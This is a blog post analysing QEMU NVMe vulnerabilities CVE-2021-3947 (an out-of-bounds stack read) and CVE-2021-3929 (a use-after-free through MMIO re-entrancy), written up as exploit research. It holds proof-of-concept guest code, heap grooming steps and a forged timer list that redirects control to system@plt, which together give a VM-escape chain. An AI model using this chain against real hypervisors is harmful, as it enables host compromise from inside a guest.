
QEMU CVE-2021-3947 and CVE-2021-3929 Exploitation Analysis

Vulnerability Analysis








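CVE-2021-3947: Information Leak
-------------------------------

### Vulnerability Analysis

The bug is in `nvme_changed_nslist`:

```c
static uint16_t nvme_changed_nslist(NvmeCtrl *n, uint8_t rae, uint32_t buf_len,
                                    uint64_t off, NvmeRequest *req)
{
    uint32_t nslist[1024];   /* 1024 * 4 = 4096 bytes on the stack */
    uint32_t trans_len;
    int i = 0;
    uint32_t nsid;

    memset(nslist, 0x0, sizeof(nslist));

    /* ... filling nslist elided in this excerpt ... */

    // [0] compute trans_len
    // bug: sizeof(nslist) - off is unsigned, so it wraps when off > sizeof(nslist)
    trans_len = MIN(sizeof(nslist) - off, buf_len);

    // [1] copy nslist + off back to the guest
    return nvme_c2h(n, ((uint8_t *)nslist) + off, trans_len, req);
}
```

Both `off` and `buf_len` come from the guest, and `off` is not validated at all. The bug triggers as follows:

1. If `off` is larger than `sizeof(nslist)` (4096 bytes, i.e. 1024 entries of 4 bytes), the unsigned subtraction at [0] wraps around to a huge value, so `trans_len = buf_len`.
2. At [1], `nvme_c2h` then copies `trans_len` bytes starting at `nslist + off` to the guest. Since `off` is controlled, this in principle allows reading arbitrary memory in the QEMU process's address space.

### Exploitation Analysis

#### Interaction Analysis

*Figure: interaction between a guest OS process and the NVMe device.*

The guest OS sends requests to the NVMe device through MMIO. After filling in the request parameters, it notifies the device, which sets up the submission queue (whose request slots live on `sq->req_list`) and arms a timer. The timer callback `nvme_process_sq` reads each command from guest memory, attaches it to a request taken from `req_list`, and processes it.

**Submitting a request from the guest**

Overall flow:

1. Set the fields of the `NvmeCtrl` structure through MMIO writes.
2. Write MMIO to trigger `nvme_start_ctrl`, which initializes the admin queues and links the preallocated request slots into `sq->req_list`.
3. Write MMIO to trigger `nvme_process_db`, which schedules `nvme_process_sq`.
4. `nvme_process_sq` takes requests from `sq->req_list` and processes them.

The core of `nvme_start_ctrl` follows; the members of `n->bar` can be set by writing to the corresponding MMIO offsets.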
```c
static int nvme_start_ctrl(NvmeCtrl *n)
{
    uint64_t cap = ldq_le_p(&n->bar.cap);
    uint32_t cc  = ldl_le_p(&n->bar.cc);
    uint32_t aqa = ldl_le_p(&n->bar.aqa);
    uint64_t asq = ldq_le_p(&n->bar.asq);   /* admin SQ base (guest physical) */
    uint64_t acq = ldq_le_p(&n->bar.acq);   /* admin CQ base (guest physical) */
    uint32_t page_bits = NVME_CC_MPS(cc) + 12;
    uint32_t page_size = 1 << page_bits;

    /* ... sanity checks on cap/cc/aqa elided ... */

    n->page_bits = page_bits;
    n->page_size = page_size;
    n->max_prp_ents = n->page_size / sizeof(uint64_t);
    n->cqe_size = 1 << NVME_CC_IOCQES(cc);
    n->sqe_size = 1 << NVME_CC_IOSQES(cc);
    nvme_init_cq(&n->admin_cq, n, acq, 0, 0, NVME_AQA_ACQS(aqa) + 1, 1);
    nvme_init_sq(&n->admin_sq, n, asq, 0, 0, NVME_AQA_ASQS(aqa) + 1);

    /* ... remaining setup elided ... */
    return 0;
}
```

It then calls `nvme_init_sq`, which links the request slots into `sq->req_list` and allocates a timer.

```c
static void nvme_init_sq(NvmeSQueue *sq, NvmeCtrl *n, uint64_t dma_addr,
                         uint16_t sqid, uint16_t cqid, uint16_t size)
{
    int i;
    NvmeCQueue *cq;

    sq->ctrl = n;
    sq->dma_addr = dma_addr;
    sq->sqid = sqid;
    sq->size = size;
    sq->cqid = cqid;
    sq->head = sq->tail = 0;
    sq->io_req = g_new0(NvmeRequest, sq->size);

    QTAILQ_INIT(&sq->req_list);
    QTAILQ_INIT(&sq->out_req_list);
    /* preallocate sq->size request slots on the free list */
    for (i = 0; i < sq->size; i++) {
        sq->io_req[i].sq = sq;
        QTAILQ_INSERT_TAIL(&(sq->req_list), &sq->io_req[i], entry);
    }
    sq->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, nvme_process_sq, sq);

    assert(n->cq[cqid]);
    cq = n->cq[cqid];
    QTAILQ_INSERT_TAIL(&(cq->sq_list), sq, entry);
    n->sq[sqid] = sq;
}
```

Afterwards, the guest writes MMIO again to tell the device that the request is ready to be processed. The device enters `nvme_process_db` and arms the timer; when the timer fires, `nvme_process_sq` handles the request.
```c
static void nvme_process_db(NvmeCtrl *n, hwaddr addr, int val)
{
    /* ... sq is looked up from the doorbell offset and its tail updated (elided) ... */
    timer_mod(sq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
}
```

**Processing requests**

The core of `nvme_process_sq`:

```c
static void nvme_process_sq(void *opaque)
{
    NvmeSQueue *sq = opaque;
    NvmeCtrl *n = sq->ctrl;
    NvmeCQueue *cq = n->cq[sq->cqid];

    uint16_t status;
    hwaddr addr;
    NvmeCmd cmd;
    NvmeRequest *req;

    while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
        /* read the next command from the SQ in guest memory */
        addr = sq->dma_addr + sq->head * n->sqe_size;
        nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
        /* ... error handling and SQ head increment elided ... */

        req = QTAILQ_FIRST(&sq->req_list);
        QTAILQ_REMOVE(&sq->req_list, req, entry);
        QTAILQ_INSERT_TAIL(&sq->out_req_list, req, entry);
        nvme_req_clear(req);
        req->cqe.cid = cmd.cid;
        memcpy(&req->cmd, &cmd, sizeof(NvmeCmd));

        status = sq->sqid ? nvme_io_cmd(n, req) : nvme_admin_cmd(n, req);
        if (status != NVME_NO_COMPLETE) {
            req->status = status;
            nvme_enqueue_req_completion(cq, req);
        }
    }
}
```

Flow:

1. Read `NvmeCmd cmd` from guest memory (`sq->dma_addr`) with `nvme_addr_read`, and take a request from `sq->req_list`.
2. Copy the command into `req->cmd`; all further processing is driven by this data.
3. Depending on `sq->sqid`, call `nvme_io_cmd` (I/O queues) or `nvme_admin_cmd` (admin queue, `sqid == 0`).
4. When done, call `nvme_enqueue_req_completion`, which re-arms `cq->timer`.
`nvme_get_log` extracts the values from `cmd` and then enters the vulnerable function `nvme_changed_nslist`:

```c
static uint16_t nvme_get_log(NvmeCtrl *n, NvmeRequest *req)
{
    NvmeCmd *cmd = &req->cmd;

    uint32_t dw10 = le32_to_cpu(cmd->cdw10);
    uint32_t dw11 = le32_to_cpu(cmd->cdw11);
    uint32_t dw12 = le32_to_cpu(cmd->cdw12);
    uint32_t dw13 = le32_to_cpu(cmd->cdw13);
    uint8_t  lid = dw10 & 0xff;
    uint8_t  lsp = (dw10 >> 8) & 0xf;
    uint8_t  rae = (dw10 >> 15) & 0x1;
    uint8_t  csi = le32_to_cpu(cmd->cdw14) >> 24;
    uint32_t numdl, numdu;
    uint64_t off, lpol, lpou;
    size_t   len;

    numdl = (dw10 >> 16);
    numdu = (dw11 & 0xffff);
    lpol = dw12;
    lpou = dw13;

    len = (((numdu << 16) | numdl) + 1) << 2;   /* number of dwords -> bytes */
    off = (lpou << 32ULL) | lpol;               /* 64-bit offset, fully guest-controlled */

    switch (lid) {
    /* ... other log pages elided ... */
    case NVME_LOG_CHANGED_NSLIST:
        return nvme_changed_nslist(n, rae, len, off, req);
    /* ... */
    }
    /* ... */
}
```

#### PoC Analysis

```c
/* DMA destination for the leaked data */
uint64_t *leak_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
mlock(leak_buf, PAGE_SIZE);
memset(leak_buf, 0, PAGE_SIZE);
void *leak_buf_phys_addr = virt_to_phys(leak_buf);   /* virt_to_phys(): helper defined elsewhere in the exp */

/* admin completion queue entries */
NvmeCqe *cqes = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
mlock(cqes, PAGE_SIZE);
memset(cqes, 0, PAGE_SIZE);
void *cqes_phys_addr = virt_to_phys(cqes);

/* admin submission queue entries (commands) */
NvmeCmd *cmds = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
mlock(cmds, PAGE_SIZE);
memset(cmds, 0, PAGE_SIZE);
void *cmds_phys_addr = virt_to_phys(cmds);

// [0] fill in the command
cmds[0].opcode = 2;                                /* NVME_ADM_CMD_GET_LOG_PAGE -> nvme_get_log() */
cmds[0].dptr.prp1 = (uint64_t)leak_buf_phys_addr;  /* prp1: DMA destination, leak_buf */
cmds[0].cdw10 = 4 + (0x1 << 16);                   /* lid = 4 (NVME_LOG_CHANGED_NSLIST -> nvme_changed_nslist()),
                                                      buf_len = (0x1 + 1) << 2 = 8 */
uint64_t off = 0x1010;                             /* > sizeof(nslist) = 0x1000: triggers the underflow */
cmds[0].cdw12 = (uint32_t)off;
cmds[0].cdw13 = (uint32_t)(off >> 32);

// [1] submit the command
nvme_reset_submit_commands(cqes_phys_addr, cmds_phys_addr, 1);
```

Main logic:

1. Allocate buffers with `mmap`: `leak_buf` receives the NVMe controller's response data, `cmds` holds the request commands, and `cqes` holds the completion queue entries.
2. Fill in the command in `cmds`:
   - `dptr.prp1` is the DMA destination address: `nvme_changed_nslist` writes the `nslist` data through `nvme_c2h` to `leak_buf_phys_addr`.
   - `cdw10` combines the length field (NUMDL, from which `buf_len` is derived) and `lid`, which give the copy size and the log page type respectively.
   - `cdw12` and `cdw13` together encode **`off`, set to 0x1010 to go out of bounds**.
3. Submit the request with `nvme_reset_submit_commands`.

*Figure: members of the NvmeCQueue structure as finally built in nvme_init_sq.*

The code of `nvme_reset_submit_commands`:

```c
void nvme_reset_submit_commands(void *cqes_phys_addr, void *cmds_phys_addr, uint32_t tail)
{
    /* ACQ: admin CQ dma_addr */
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ACQ, (uint32_t)(uint64_t)cqes_phys_addr);
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ACQ + 4, (uint32_t)((uint64_t)cqes_phys_addr >> 32));
    /* ASQ: admin SQ dma_addr */
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ASQ, (uint32_t)(uint64_t)cmds_phys_addr);
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_ASQ + 4, (uint32_t)((uint64_t)cmds_phys_addr >> 32));
    /* AQA: ACQS = ASQS = 0x20, so nvme_init_cq/nvme_init_sq get size 32 + 1 */
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_AQA, 0x200020);
    /* CC = 0: reset the controller, nvme_ctrl_reset() */
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_CC, (uint32_t)0);
    /* CC: IOCQES = 4, IOSQES = 6, EN = 1: start the controller, nvme_start_ctrl() */
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_CC, (uint32_t)((4 << 20) + (6 << 16) + 1));
    /* admin SQ tail doorbell: set tail for the submitted commands */
    mmio_write_l_fn(nvme_mmio_region, NVME_OFFSET_SQyTDBL, tail);
}
```

Writing these registers sets the fields in `NvmeCtrl`, e.g. `ASQ` is set to `cmds_phys_addr`. The final write to offset 0x1000 (the doorbell) makes the device arm its timer (`nvme_process_db`), after which `nvme_process_sq` reads the command from that address:

```c
addr = sq->dma_addr + sq->head * n->sqe_size;
nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
```

Execution finally reaches `nvme_changed_nslist` with `off = 0x1010` and `buf_len = 8`:

```c
// [0] off = 0x1010 > sizeof(nslist) = 0x1000, so the subtraction wraps and trans_len = buf_len = 8
trans_len = MIN(sizeof(nslist) - off, buf_len);
// [1] copies 8 bytes from nslist + 0x1010 to the guest
return nvme_c2h(n, ((uint8_t *)nslist) + off, trans_len, req);
```

As a result, `nvme_c2h` copies the 8 bytes at `nslist + 0x1010`, 16 bytes past the end of the stack array, to `leak_buf_phys_addr`.
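#### Exploitation Strategy

Because `off` is fully controlled, once the address of `nslist` has been leaked through the out-of-bounds read, choosing `off` as the distance from `nslist` to a target address turns the bug into an arbitrary read.

When QEMU is started with 2 GB of guest memory, the QEMU process mmaps a 2 GB region of virtual memory that linearly maps the guest's RAM.

*Figure: linear mapping between guest RAM and the 2 GB region in the QEMU process.*

Its start address can be found by searching the QEMU process for a 2 GB mapping:

```plaintext
# pmap $(pidof qemu-system-x86_64) | grep 2097152
00007f40dbe00000 2097152K rw---   [ anon ]
```

This address is stored on the heap, so the out-of-bounds stack read can be used to obtain a heap pointer, after which the arbitrary read can search the heap for the host-side start address of guest RAM. That address is then used to place the payload inside QEMU.

**Data actually leaked**

1. Leak an `rbp` value from the stack and compute the address of `nslist` from it.
2. Find a heap pointer on the stack; using the address of `nslist`, compute the `off` needed to search the heap for the base address of guest RAM on the QEMU side.
3. Find a pointer into the QEMU binary on the stack, compute the QEMU base address, and derive the address of `system@plt` from its offset.

CVE-2021-3929: UAF via MMIO Re-entrancy
---------------------------------------

### Vulnerability Analysis

While handling a guest request, the device uses `nvme_c2h` to write response data into guest memory. If the guest sets the destination physical address to the NVMe device's own MMIO space, the write invokes the NVMe MMIO handler, which can be driven into `nvme_ctrl_reset` to free `cq->timer`. After `nvme_c2h` returns, `nvme_process_sq` uses the already freed `cq->timer`, resulting in a use-after-free.

Taking `nvme_changed_nslist` as an example:

*Figure: UAF trigger path through nvme_changed_nslist.*

Flow:

1. The guest writes the NVMe MMIO space to submit a request to the device, and sets the **request's DMA address to the NVMe MMIO region**.
2. The device enters `nvme_process_sq`, fetches the request, and hands it to `nvme_admin_cmd`.
3. `nvme_admin_cmd` calls `nvme_changed_nslist`, which finally calls `nvme_c2h` to write data to the guest physical address, **i.e. into the NVMe MMIO region**.
4. The MMIO write invokes the NVMe MMIO callback; by controlling the written offset and value, the guest makes the device **run `nvme_ctrl_reset` and free `cq->timer`**.
5. `nvme_c2h` returns and execution unwinds back to `nvme_process_sq`, which then calls `nvme_enqueue_req_completion` and **uses the `cq->timer` freed in the previous step**.

The details follow, together with the relevant code.

Trigger path:

```plaintext
nvme_process_sq -> nvme_admin_cmd -> nvme_get_log -> nvme_changed_nslist -> nvme_c2h
```

`nvme_c2h` first uses `nvme_map_dptr` to extract the destination physical addresses from `cmd.dptr`, then calls `nvme_tx` to write them:

```c
static inline uint16_t nvme_c2h(NvmeCtrl *n, uint8_t *ptr, uint32_t len,
                                NvmeRequest *req)
{
    uint16_t status;

    /* build req->sg from the guest-supplied PRP/SGL in cmd.dptr */
    status = nvme_map_dptr(n, &req->sg, len, &req->cmd);
    if (status) {
        return status;
    }

    return nvme_tx(n, &req->sg, ptr, len, NVME_TX_DIRECTION_FROM_DEVICE);
}
```

`nvme_tx` uses its `dir` argument to decide whether to read from or write to guest physical memory.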
```c
static uint16_t nvme_tx(NvmeCtrl *n, NvmeSg *sg, uint8_t *ptr, uint32_t len,
                        NvmeTxDirection dir)
{
    assert(sg->flags & NVME_SG_ALLOC);

    if (sg->flags & NVME_SG_DMA) {
        uint64_t residual;

        /* names are from the device buffer's point of view:
         * dma_buf_write() fills ptr from guest memory,
         * dma_buf_read() copies ptr out to guest memory */
        if (dir == NVME_TX_DIRECTION_TO_DEVICE) {
            residual = dma_buf_write(ptr, len, &sg->qsg);
        } else {
            residual = dma_buf_read(ptr, len, &sg->qsg);
        }

        if (unlikely(residual)) {
            return NVME_INVALID_FIELD | NVME_DNR;
        }
    }
    /* ... non-DMA path elided ... */

    return NVME_SUCCESS;
}
```

`dma_buf_write` and `dma_buf_read` both end up in `address_space_rw`:

```plaintext
dma_buf_read  --> dma_buf_rw --> dma_memory_rw --> dma_memory_rw_relaxed --> address_space_rw --> address_space_write
dma_buf_write --> dma_buf_rw --> dma_memory_rw --> dma_memory_rw_relaxed --> address_space_rw --> address_space_read_full
```

When `address_space_rw` accesses a physical address that belongs to an MMIO region, the region's MMIO callback is invoked. If the guest sets the DMA destination to the NVMe device's own MMIO region and steers execution into `nvme_write_bar --> nvme_ctrl_reset --> nvme_free_cq`, `cq->timer` is freed.

```c
static void nvme_free_cq(NvmeCQueue *cq, NvmeCtrl *n)
{
    /* ... */
    timer_free(cq->timer);   /* cq->timer is freed here */
    /* ... */
}

static void nvme_ctrl_reset(NvmeCtrl *n)
{
    int i;
    /* ... */
    for (i = 0; i < n->params.max_ioqpairs + 1; i++) {
        if (n->cq[i] != NULL) {
            nvme_free_cq(n->cq[i], n);
        }
    }
    /* ... */
}

static void nvme_write_bar(NvmeCtrl *n, hwaddr offset, uint64_t data,
                           unsigned size)
{
    /* ... */
    switch (offset) {
    /* ... */
    case NVME_REG_CC:
        /* disabling an enabled controller (data = 0x0 in the backtrace below) resets it */
        nvme_ctrl_reset(n);
        /* ... */
    }
}
```

Call stack when `nvme_c2h` triggers `nvme_ctrl_reset`:

```plaintext
gef➤  bt
#0  nvme_ctrl_reset (n=0x55c5cd610dc0) at ../hw/nvme/ctrl.c:5543
#1  0x000055c5cbb422e9 in nvme_write_bar (n=0x55c5cd610dc0, offset=0x14, data=0x0, size=0x4) at ../hw/nvme/ctrl.c:5808
#2  0x000055c5cbb430ad in nvme_mmio_write (opaque=0x55c5cd610dc0, addr=0x14, data=0x0, size=0x4) at ../hw/nvme/ctrl.c:6158
#3  0x000055c5cbde0464 in memory_region_write_accessor (mr=0x55c5cd611820, addr=0x14, value=0x7ffe638c97a8, size=0x4, shift=0x0, mask=0xffffffff, attrs=...) at ../softmmu/memory.c:492
#4  0x000055c5cbde06ae in access_with_adjusted_size (addr=0x14, value=0x7ffe638c97a8, size=0x4, access_size_min=0x2, access_size_max=0x8, access_fn=0x55c5cbde0368 <memory_region_write_accessor>, mr=0x55c5cd611820, attrs=...) at ../softmmu/memory.c:554
#5  0x000055c5cbde36b6 in memory_region_dispatch_write (mr=0x55c5cd611820, addr=0x14, data=0x0, op=MO_32, attrs=...) at ../softmmu/memory.c:1504
#6  0x000055c5cbe31a62 in flatview_write_continue (fv=0x7f181003e3d0, addr=0xf4094014, attrs=..., ptr=0x7f1823669000, len=0xfec, addr1=0x14, l=0x4, mr=0x55c5cd611820) at ../softmmu/physmem.c:2777
#7  0x000055c5cbe31ba7 in flatview_write (fv=0x7f181003e3d0, addr=0xf4094000, attrs=..., buf=0x7f1823669000, len=0x1000) at ../softmmu/physmem.c:2817
#8  0x000055c5cbe31f11 in address_space_write (as=0x55c5cd610fe8, addr=0xf4094000, attrs=..., buf=0x7f1823669000, len=0x1000) at ../softmmu/physmem.c:2909
#9  0x000055c5cbe31f7e in address_space_rw (as=0x55c5cd610fe8, addr=0xf4094000, attrs=..., buf=0x7f1823669000, len=0x1000, is_write=0x1) at ../softmmu/physmem.c:2919
#10 0x000055c5cba3ef09 in dma_memory_rw_relaxed (as=0x55c5cd610fe8, addr=0xf4094000, buf=0x7f1823669000, len=0x1000, dir=DMA_DIRECTION_FROM_DEVICE) at /home/kali/qemu-exp/CVE-2021-3929-3947/qemu-6.1.0/include/sysemu/dma.h:88
#11 0x000055c5cba3ef56 in dma_memory_rw (as=0x55c5cd610fe8, addr=0xf4094000, buf=0x7f1823669000, len=0x1000, dir=DMA_DIRECTION_FROM_DEVICE) at /home/kali/qemu-exp/CVE-2021-3929-3947/qemu-6.1.0/include/sysemu/dma.h:127
#12 0x000055c5cba402ea in dma_buf_rw (ptr=0x7f1823669000 "", len=0x2000, sg=0x7f1810017ac8, dir=DMA_DIRECTION_FROM_DEVICE) at ../softmmu/dma-helpers.c:309
#13 0x000055c5cba4033d in dma_buf_read (ptr=0x7f1823668000 "", len=0x3000, sg=0x7f1810017ac8) at ../softmmu/dma-helpers.c:320
#14 0x000055c5cbb36a4c in nvme_tx (n=0x55c5cd610dc0, sg=0x7f1810017ac0, ptr=0x7f1823668000 "", len=0x3000, dir=NVME_TX_DIRECTION_FROM_DEVICE) at ../hw/nvme/ctrl.c:1154
#15 0x000055c5cbb36b4d in nvme_c2h (n=0x55c5cd610dc0, ptr=0x7f1823668000 "", len=0x3000, req=0x7f1810017a30) at ../hw/nvme/ctrl.c:1189
#16 0x000055c5cbb3dfc6 in nvme_changed_nslist (n=0x55c5cd610dc0, rae=0x0, buf_len=0x3000, off=0xffffff19bfd9e4c0, req=0x7f1810017a30) at ../hw/nvme/ctrl.c:4198
#17 0x000055c5cbb3e3c3 in nvme_get_log (n=0x55c5cd610dc0, req=0x7f1810017a30) at ../hw/nvme/ctrl.c:4285
#18 0x000055c5cbb4125d in nvme_admin_cmd (n=0x55c5cd610dc0, req=0x7f1810017a30) at ../hw/nvme/ctrl.c:5475
#19 0x000055c5cbb415c6 in nvme_process_sq (opaque=0x55c5cd6145b8) at ../hw/nvme/ctrl.c:5530
#20 0x000055c5cc0533e3 in timerlist_run_timers (timer_list=0x55c5cc836bf0) at ../util/qemu-timer.c:573
#21 0x000055c5cc053485 in qemu_clock_run_timers (type=QEMU_CLOCK_VIRTUAL) at ../util/qemu-timer.c:587
#22 0x000055c5cc05375a in qemu_clock_run_all_timers () at ../util/qemu-timer.c:669
#23 0x000055c5cc049f8e in main_loop_wait (nonblocking=0x0) at ../util/main-loop.c:542
#24 0x000055c5cbe9bac0 in qemu_main_loop () at ../softmmu/runstate.c:726
#25 0x000055c5cb9b3612 in main (argc=0x21, argv=0x7ffe638caf18, envp=0x7ffe638cb028) at ../softmmu/main.c:50
```

When `nvme_changed_nslist` returns to `nvme_process_sq`, `nvme_enqueue_req_completion` is called:

```c
    while (!(nvme_sq_empty(sq) || QTAILQ_EMPTY(&sq->req_list))) {
        /* ... */
        status = sq->sqid ? nvme_io_cmd(n, req) : nvme_admin_cmd(n, req);
        if (status != NVME_NO_COMPLETE) {
            req->status = status;
            nvme_enqueue_req_completion(cq, req);
        }
    }
```

`nvme_enqueue_req_completion` then uses the **already freed `cq->timer`**:

```c
static void nvme_enqueue_req_completion(NvmeCQueue *cq, NvmeRequest *req)
{
    /* ... */
    timer_mod(cq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);   /* use after free */
}
```

### Exploitation Analysis

If the memory of `cq->timer` can be reclaimed between the free and the reuse, we can control PC, because the `QEMUTimerList` that `timer->timer_list` points to contains a function pointer:

```c
struct QEMUTimer {
    int64_t expire_time;        /* in nanoseconds */
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;
    void *opaque;
    QEMUTimer *next;
    int attributes;
    int scale;
};
```

`intel_hda_mmio_write --> intel_hda_set_st_ctl --> intel_hda_parse_bdl` allocates memory whose size and subsequent contents are both guest-controlled:

```c
static void intel_hda_parse_bdl(IntelHDAState *d, IntelHDAStream *st)
{
    hwaddr addr;
    uint8_t buf[16];
    uint32_t i;

    addr = intel_hda_addr(st->bdlp_lbase, st->bdlp_ubase);
    st->bentries = st->lvi + 1;
    g_free(st->bpl);
    /* allocation size is controlled by the guest through lvi */
    st->bpl = g_malloc(sizeof(bpl) * st->bentries);
    for (i = 0; i < st->bentries; i++, addr += 16) {
        /* contents are read from guest memory at addr */
        pci_dma_read(&d->pci, addr, buf, 16);
        st->bpl[i].addr  = le64_to_cpu(*(uint64_t *)buf);
        st->bpl[i].len   = le32_to_cpu(*(uint32_t *)(buf + 8));
        st->bpl[i].flags = le32_to_cpu(*(uint32_t *)(buf + 12));
        dprint(d, 1, "bdl/%d: 0x%" PRIx64 " +0x%x, 0x%x\n",
               i, st->bpl[i].addr, st->bpl[i].len, st->bpl[i].flags);
    }

    st->bsize = st->cbl;
    st->lpib = 0;
    st->be = 0;
    st->bp = 0;
}
```

The function first allocates `st->bpl` based on `st->bentries` and then reads data into it; both `st->bentries` and `addr` are set by the guest through MMIO.

*Figure: reclaiming cq->timer.*

The main difference from the trigger flow above is that `cmd.dptr` is set up so that a single `nvme_c2h` call performs several `dma_buf_rw` transfers:

1. Steps 3-4: the first write goes to the NVMe MMIO and frees `cq->timer`.
2. Steps 5-6: the second write goes to the HDA MMIO and enters `intel_hda_parse_bdl`, whose `malloc` reclaims `cq->timer` with controlled contents.

Concrete exploitation steps:

1. Use the information leak to obtain the address of guest RAM in the QEMU process, `host_guest_ram_address`, and the address of `system@plt`.
2. Pick an address `host_guest_cq_timerlist_buf_address` inside the region starting at `host_guest_ram_address` and forge a `timer_list` there.
3. Write the CTL registers of HDA streams IN1-IN3 through MMIO to allocate three 0x30-byte blocks. This leaves three free slots in the tcache, so that freeing `cq->timer` later puts it into the tcache.
   - During debugging the tcache bin turned out to be already full, so the freed timer would otherwise go into a smallbin; since `intel_hda_parse_bdl` takes its chunk from the tcache, it could not reclaim it.
4. Trigger `nvme_ctrl_reset` to free `cq->timer`.
5. Use `intel_hda_parse_bdl` to reclaim the timer and set `timer->timer_list = host_guest_cq_timerlist_buf_address`.
6. Wait for `timer_list->notify_cb(timer_list->notify_opaque, timer_list->clock->type)` to run.

*Figure: layout of the tampered timer.*

The code in the exp that forges `cq_timerlist_buf`:

```c
/* Construct fake timer and timerlist.
 * elf_base_address, ELF_SYSTEM_PLT_OFFSET and command are defined elsewhere in the exp. */
uint64_t construct_timer(uint64_t host_guest_ram_address)
{
    QEMUTimer *cq_timer_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
    mlock(cq_timer_buf, PAGE_SIZE);
    memset(cq_timer_buf, 0, PAGE_SIZE);
    void *cq_timer_buf_phys_addr = virt_to_phys(cq_timer_buf);

    QEMUTimerList *cq_timerlist_buf = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
    mlock(cq_timerlist_buf, PAGE_SIZE);
    memset(cq_timerlist_buf, 0, PAGE_SIZE);
    void *cq_timerlist_buf_phys_addr = virt_to_phys(cq_timerlist_buf);

    /* guest physical address == offset into guest RAM
     * (will be - 0x100000000 + 0x80000000 with bigger RAM) */
    uint64_t cq_timerlist_buf_ram_offset = (uint64_t)cq_timerlist_buf_phys_addr;
    uint64_t host_guest_cq_timerlist_buf_address = host_guest_ram_address + cq_timerlist_buf_ram_offset;

    /* fake timer -> fake timer list, addressed by its host virtual address */
    cq_timer_buf->timer_list = (QEMUTimerList *)host_guest_cq_timerlist_buf_address;

    cq_timerlist_buf->active_timers_lock.initialized = true;
    cq_timerlist_buf->active_timers = (QEMUTimer *)NULL;
    /* notify_cb(notify_opaque, clock->type) becomes system@plt(command) */
    cq_timerlist_buf->notify_cb = (QEMUTimerListNotifyCB *)(elf_base_address + ELF_SYSTEM_PLT_OFFSET);
    void *command_guest_phys_address = virt_to_phys(command);
    uint64_t command_guest_ram_offset = (uint64_t)command_guest_phys_address;
    cq_timerlist_buf->notify_opaque = (void *)(command_guest_ram_offset + host_guest_ram_address);
    /* clock->type, second parameter, all zeros */
    cq_timerlist_buf->clock = (QEMUClock *)((uint8_t *)host_guest_cq_timerlist_buf_address + PAGE_SIZE / 2);

    return (uint64_t)cq_timer_buf_phys_addr;
}
```

Patches
-------

### CVE-2021-3947
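<https://gitlab.com/qemu-project/qemu/-/commit/e2c57529c9306e4>

The patch validates `off`.

### CVE-2021-3929

<https://gitlab.com/qemu-project/qemu/-/commit/736b01642d85be832385?view=parallel>

The patch adds a check in `nvme_map_addr` that rejects DMA targeting the NVMe device's own MMIO region.

Summary
-------

- Hardware specifications and manuals are a useful aid when analyzing device-emulation code.
- Allocating chunks from the tcache in advance frees up tcache slots for the victim object, which makes it possible to reclaim the freed memory.

References
----------

1. <https://github.com/QiuhaoLi/CVE-2021-3929-3947>
2. [https://qiuhao.org/Matryoshka_Trap.pdf](https://qiuhao.org/Matryoshka_Trap.pdf)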

Published 2023-03-31 09:00:02


hac425
